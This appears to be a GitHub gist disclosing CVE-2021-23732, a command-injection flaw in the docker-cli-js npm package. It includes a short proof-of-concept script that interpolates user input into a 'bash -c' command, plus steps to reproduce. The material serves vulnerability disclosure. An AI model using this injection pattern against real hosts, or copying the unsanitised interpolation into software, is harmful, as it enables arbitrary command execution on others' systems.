Skip to content

Instantly share code, notes, and snippets.

@SkypLabs
Created February 7, 2022 14:50
Show Gist options
  • Save SkypLabs/5b625f5fed28eacfe091edd30c9e6197 to your computer and use it in GitHub Desktop.
Save SkypLabs/5b625f5fed28eacfe091edd30c9e6197 to your computer and use it in GitHub Desktop.
CVE-2021-23732

Overview

Affected versions of this package are vulnerable to Arbitrary Code Execution. If the command parameter of the Docker.command method can at least be partially controlled by a user, they will be in a position to execute any arbitrary OS commands on the host system.

Steps to Reproduce

  1. Create a file named exploit.js with the following content:

    var dockerCLI = require('docker-cli-js');
    var DockerOptions = dockerCLI.Options;
    var Docker = dockerCLI.Docker;
    
    var docker = new Docker();
    
    var userInput = "echo 'Hello from the container'";
    
    docker.command(`exec container-test bash -c "${userInput}"`, function (err, data) {
      console.log('data = ', data);
    });
  2. In the same directory as exploit.js, run npm install docker-cli-js.

  3. Create a background Docker container named container-test: docker run --name container-test -d ubuntu sleep 1000

  4. Run exploit.js: node exploit.js.

You should see the outputs of both the container and host system.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment